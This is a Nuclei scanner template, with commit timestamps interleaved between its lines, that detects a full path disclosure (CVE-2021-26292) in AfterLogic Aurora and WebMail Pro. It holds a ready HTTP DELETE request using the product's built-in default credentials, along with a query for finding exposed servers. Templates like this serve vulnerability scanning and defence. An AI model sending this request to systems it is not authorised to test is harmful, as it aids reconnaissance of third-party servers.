2023-11-24 00:42:45 +00:00
id : CVE-2021-26292
info :
2023-11-25 10:15:44 +00:00
name : AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
2023-11-24 00:42:45 +00:00
author : johnk3r
2023-11-25 10:15:44 +00:00
severity : low
description : |
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’ s the predefined password “caldav_public_user” allows the attacker to obtain web root path.
2023-11-24 00:42:45 +00:00
reference :
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md
2023-11-25 10:15:44 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-26292
classification :
cve-id : CVE-2021-26292
2023-11-24 00:42:45 +00:00
metadata :
2023-11-25 10:15:44 +00:00
verified : true
2023-12-05 09:50:33 +00:00
max-request : 1
2023-11-24 00:42:45 +00:00
vendor : AfterLogic
product : AfterLogic Aurora & WebMail
2023-12-05 09:50:33 +00:00
fofa-query : "X-Server: AfterlogicDAVServer"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,afterlogic,path,disclosure,AfterLogic
2023-11-24 00:42:45 +00:00
http :
2023-11-25 10:15:44 +00:00
- raw :
- |
DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1
Host : {{Hostname}}
Authorization : Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
2023-11-24 00:42:45 +00:00
matchers-condition : and
matchers :
- type : word
2023-11-25 10:15:44 +00:00
part : body
2023-11-24 00:42:45 +00:00
words :
- "caldav_public_user"
- "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
condition : and
2023-11-25 10:15:44 +00:00
- type : word
part : header
words :
- "application/xml"
2023-11-24 00:42:45 +00:00
- type : status
status :
- 404
2023-12-06 05:59:56 +00:00
# digest: 490a00463044022055028104fa52e53dda65cd6c1fd9a36737ccf96678fcf059579ef620ef78fd70022024bc13dfdffbb91e551a6ed0049638444de819870faef2b8ad3f8cf5cee035e7:922c64590222798bb761d5b6d8e72950